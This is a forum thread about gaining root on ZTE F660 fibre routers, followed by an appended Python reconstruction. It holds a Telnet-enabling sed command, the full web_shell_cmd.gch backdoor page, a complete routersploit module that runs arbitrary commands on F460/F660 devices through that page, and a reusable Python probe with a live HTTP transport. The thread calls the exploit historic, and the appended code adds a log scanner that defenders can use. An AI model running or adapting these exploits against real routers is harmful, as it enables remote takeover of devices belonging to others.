ZTE ZXHN F660 - Power to the masses

Newtman
Posts: 3
Registered on: 02 May 2018 04:22

Re: ZTE ZXHN F660 - Power to the masses

Post by Newtman » 22 Aug 2018 14:24

Hello,
We have another problem: I have got an F660v5 running firmware "t38" and the passwords are encrypted! When you print information with sendcmd (via TTL) the passwords are shown as asterisks.
I rolled back to the first FW and I got the passwords without problem, but it is different in the latest firmware.
I guess the new F670 has got the encryption too.

Do you know something about this?

error_404
Global moderator
Posts: 347
Registered on: 22 Dec 2012 10:58

Re: ZTE ZXHN F660 - Power to the masses

Post by error_404 » 22 Aug 2018 20:09

Hi,
first of all, I only have an F660, and for this reason I cannot give feedback on the F670.
If in the new firmware the password is encrypted, you can change it as root and create another user with Telnet access!

Code: Select all

sed -i 's|TS_Enable" val="0"|TS_Enable" val="1"|g' /userconfig/cfg/db_default_cfg.xml
of course with root, which you mention you've gained
:evil:
"For me, the worst thing in Bulgaria is the wonderful delight people here take in persecuting one another and ruining each other's work."
K. Jireček, 13.12.1881

Newtman
Posts: 3
Registered on: 02 May 2018 04:22

Re: ZTE ZXHN F660 - Power to the masses

Post by Newtman » 23 Aug 2018 15:35

error_404 wrote:
22 Aug 2018 20:09
Hi,
first of all, I only have an F660, and for this reason I cannot give feedback on the F670.
If in the new firmware the password is encrypted, you can change it as root and create another user with Telnet access!

Code: Select all

sed -i 's|TS_Enable" val="0"|TS_Enable" val="1"|g' /userconfig/cfg/db_default_cfg.xml
of course with root, which you mention you've gained
:evil:
Yes, I know. I changed the password, but I want an easy way to access as admin without opening the ONT... In consequence, to know the original password.
Do you know where the hash is stored?

Thanks!

Newtman
Posts: 3
Registered on: 02 May 2018 04:22

Re: ZTE ZXHN F660 - Power to the masses

Post by Newtman » 02 Feb 2019 22:55

Today I found a new firmware on the F660 v5.2... V5.2.10P3T52 :thumbdown:
I can't enter by TTL because now root/root doesn't work anymore. Telnet is closed on the LAN side too...

I think we haven't got more options now, what do you think?

My idea now is to dump the NAND; it is an F59L1G81MA. I have got a pair of "universal" programmers, I need the socket now.

error_404
Global moderator
Posts: 347
Registered on: 22 Dec 2012 10:58

For historic archive: WebShell Command Exploit

Post by error_404 » 12 Jun 2019 20:30

Just putting up some exploit which is not working anymore, but for historic reasons and knowledge!

https://blog.rapid7.com/2014/03/03/disc ... -backdoor/
http://cve.mitre.org/cgi-bin/cvename.cg ... -2014-2321
https://www.kb.cert.org/vuls/id/600724/

web_shell_cmd.gch
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, must-revalidate">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>
F660 Webshell
</title>
<LINK REL="stylesheet" HREF="css/login.css" TYPE="text/css" />
<LINK REL="stylesheet" HREF="css/template.css" TYPE="text/css" />
<style>
* {
margin: 0 0 0 0;
padding: 0;
}
.textarea_1 {
height:420px;
width:794px;
border:1px solid #7F9DB7;
font-size: 12px;
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;
text-align:left;
}
#e8_container {
margin: 0 auto;
width: 800px;
text-align: left;
position: relative;
min-height: 600px;
height: 600px;
height: 600px;
}
#banner {
width:800px;
height:70px;
}
.bottom_td3 {
width:800px;
background-color:#eeeeee;
margin-right:2px;
text-align:right;
}
.copyright {
float:left;
display:block;
height:16px;
width:800px;
padding-top:10px;
border-left:1px solid #B1B1B1;
border-right:1px solid #B1B1B1;
text-align:center;
}
.bottom_line {
float:left;
display:block;
background-color:#5aa929;
height:8px;
width:800px;
}
.type{
position:absolute;
top:32px;left:540px;
font:20px Arial,sans-serif;
color:#fff;z-index:999;
}
.inputId {
width:720px;
}
table.table td.td11 {
width:30%;
height:24px;
text-align:right;
}
</style>
<script language="javascript">

function getObj(id) {
return (document.getElementById(id));
}

function jslSetValue(src, dst) {
var ss = document.getElementById(dst).value;
document.getElementById(src).value = ss;
}

function setValue(id, value) {
document.getElementById(id).value = value;
}

function Transfer_meaning(id, value) {
document.getElementById(id).value = value;
}
function getValue(id) {
return (document.getElementById(id).value);
}

function jslDisable(id) {
var i;
var num = jslDisable.arguments.length;
if (num == 0) return;
for (i = 0; i < num; i++) {
document.getElementById(arguments).disabled = true;
}
}
var CMD_PARA = new Array(
"Cmd",
"CmdAck"
);
function pageLoad(url) {
getObj("running").style.display = "none";
}
function pageSetValue() {
jslSetValue("Cmd", "Frm_Cmd");
}
function pageSubmit() {
jslDisable("Btn_Submit");
pageSetValue();
setValue("IF_ACTION", "apply");
getObj("running").style.display = "";
getObj("running_title").innerHTML = "it is running, please wait...";
getObj("fSubmit").submit();
}
</script>
<%
IMPORT FILE "common_gch.gch";
var FP_ERRORSTR = "SUCC";
var FP_PARANUM = 2;
var PARA[2] =
{
"Cmd",
"CmdAck"
};

create_form_start("fSubmit", "'/web_shell_cmd.gch'");
createBasicHidden();
create_hidden_newpara(PARA, FP_PARANUM);
var CmdAck="";
var Cmd = request("Cmd");
var FP_ACTION = request("IF_ACTION");
if(FP_ACTION == "apply")
{
CmdAck = show_shellcmd(Cmd);
}
getDisplayInstError(FP_ERRORSTR);
undoDBSave();

create_form_end();
%>
</head>

<body>
<div id="e8_container" style="background-color:#eeeeee;">
<div id="head">
<div id="banner" style="background-image:url(img/banner.gif); background-repeat:no-repeat"></div>
</div>
<table class="table" width="500px" border="0" align="center">
<tr>
</tr>
<tr id="running" class="white" style="display: none;">
<td>
<font id="running_title" style="display: ;"></font>&nbsp;&nbsp;<img src="img/uploading.gif">
</td>
</tr>
<tr>
<td class="td3" colspan="2">
</td>
</tr>
<tr>
<td class="td11" id="Fnt_Cmd">Command: </td>
<td class="td2">
<input name="textfield22" type="text" id="Frm_Cmd" class="inputId" value="" size="150" />
</td>
</tr>
<tr>
<td colspan="2" align="right">
<input name='Submit' type='button' id='Btn_Submit' onclick=pageSubmit() class='button' value=' Submit ' /></td>
</tr>
<br>
<tr>
<td class="td3" colspan="2">
<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1"><%=CmdAck;%></textarea>
</td>
</tr>
</table>
<br>
</div>
</body>

</html>


Routersploit Module
f460_f660_backdoor.py

import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "ZTE F460 & F660 Backdoor RCE",
        "description": "Exploits ZTE F460 and F660 backdoor vulnerability that allows "
                       "executing commands on operating system level.",
        "authors": (
            "Rapid7",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://community.rapid7.com/community/ ... h-backdoor",
        ),
        "devices": (
            "ZTE F460",
            "ZTE F660",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop")
            shell(self)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    def execute(self, cmd):
        # Form fields the backdoor page expects; IF_ACTION=apply is what makes
        # the .gch template call show_shellcmd(Cmd)
        data = {
            "IF_ACTION": "apply",
            "IF_ERRORSTR": "SUCC",
            "IF_ERRORPARAM": "SUCC",
            "IF_ERRORTYPE": "-1",
            "Cmd": cmd,
            "CmdAck": ""
        }

        response = self.http_request(
            method="POST",
            path="/web_shell_cmd.gch",
            data=data
        )
        if response is None:
            return ""

        if response.status_code == 200:
            # The command output is rendered into the Frm_CmdAck textarea
            regexp = '<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1">(.*?)</textarea>'
            res = re.findall(regexp, response.text, re.DOTALL)

            if len(res):
                return res[0]

        return ""

    @mute
    def check(self):
        # Echo a random marker and look for it in the returned CmdAck
        marker = utils.random_text(32)
        cmd = "echo {}".format(marker)

        response = self.execute(cmd)
        if marker in response:
            return True  # target is vulnerable

        return False  # target is not vulnerable

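The following is an added example, not code from the thread, from ZTE or from routersploit. It reconstructs the exchange the archived web_shell_cmd.gch page and the routersploit module above perform (POST IF_ACTION=apply plus Cmd, then read CmdAck out of the Frm_CmdAck textarea) with the HTTP transport injected, so the probe logic can be exercised offline against a constructed fake device, and adds the defender-side counterpart: a scanner over constructed access-log lines that flags requests to the backdoor path. The textarea regex is the one from the module; fake_device(), urllib_transport(), log_hits() and the log format are assumptions made for this example.

```python
"""Offline reconstruction of the ZTE web_shell_cmd.gch probe (added example)."""
import re
import secrets
import urllib.error
import urllib.parse
import urllib.request

SHELL_PATH = "/web_shell_cmd.gch"
# Same pattern as the routersploit module: CmdAck is rendered into this textarea.
ACK_RE = re.compile(
    r'<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1">(.*?)</textarea>',
    re.DOTALL,
)


def build_form(cmd):
    """Form fields the .gch template expects; IF_ACTION=apply triggers show_shellcmd(Cmd)."""
    return {
        "IF_ACTION": "apply",
        "IF_ERRORSTR": "SUCC",
        "IF_ERRORPARAM": "SUCC",
        "IF_ERRORTYPE": "-1",
        "Cmd": cmd,
        "CmdAck": "",
    }


def parse_cmd_ack(html):
    """Command output from the response page, or '' when the textarea is absent."""
    m = ACK_RE.search(html)
    return m.group(1) if m else ""


def urllib_transport(base_url, timeout=5):
    """Real transport (assumed helper): POST an urlencoded form, return (status, body)."""
    def post(path, fields):
        body = urllib.parse.urlencode(fields).encode()
        req = urllib.request.Request(base_url.rstrip("/") + path, data=body, method="POST")
        try:
            with urllib.request.urlopen(req, timeout=timeout) as r:
                return r.status, r.read().decode("utf-8", "replace")
        except urllib.error.URLError:
            return None, ""
    return post


def execute(post, cmd):
    """Run one command through the backdoor page using the given transport."""
    status, body = post(SHELL_PATH, build_form(cmd))
    return parse_cmd_ack(body) if status == 200 else ""


def check(post):
    """Routersploit-style check: echo a random marker and look for it in CmdAck."""
    marker = secrets.token_hex(16)
    return marker in execute(post, "echo " + marker)


def fake_device(vulnerable=True):
    """Constructed stand-in for an ONT; only answers 'echo ...' so the probe can run offline."""
    page = ('<html><body><textarea cols="" rows="" id="Frm_CmdAck" '
            'class="textarea_1">{ack}</textarea></body></html>')

    def post(path, fields):
        if path != SHELL_PATH or not vulnerable:
            return 404, "<html>Not Found</html>"
        cmd = fields.get("Cmd", "")
        ack = cmd[5:] + "\n" if fields.get("IF_ACTION") == "apply" and cmd.startswith("echo ") else ""
        return 200, page.format(ack=ack)
    return post


# Constructed sample log lines in a common-log-style format (assumed, not from the device).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jun/2019:20:30:01 +0300] "POST /web_shell_cmd.gch HTTP/1.1" 200 1423',
    '10.0.0.6 - - [12/Jun/2019:20:30:02 +0300] "GET /login.gch HTTP/1.1" 200 812',
    '10.0.0.7 - - [12/Jun/2019:20:30:03 +0300] "GET /web_shell_cmd.gch?x=1 HTTP/1.1" 200 1410',
]
HIT_RE = re.compile(r'^(\S+) .*"(GET|POST) /web_shell_cmd\.gch[^"]*"')


def log_hits(lines):
    """Defender side: (client, method) for every request that touched the backdoor page."""
    hits = []
    for line in lines:
        m = HIT_RE.search(line)
        if m:
            hits.append((m.group(1), m.group(2)))
    return hits


if __name__ == "__main__":
    print("fake vulnerable device:", check(fake_device(True)))
    print("fake patched device:", check(fake_device(False)))
    print("log hits:", log_hits(SAMPLE_LOG))
```

Against a real device the same check() is called with urllib_transport("http://192.0.2.1"); any hit from log_hits() on an ONT's access log is worth treating as an attempted or successful compromise, since the page has no legitimate use.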
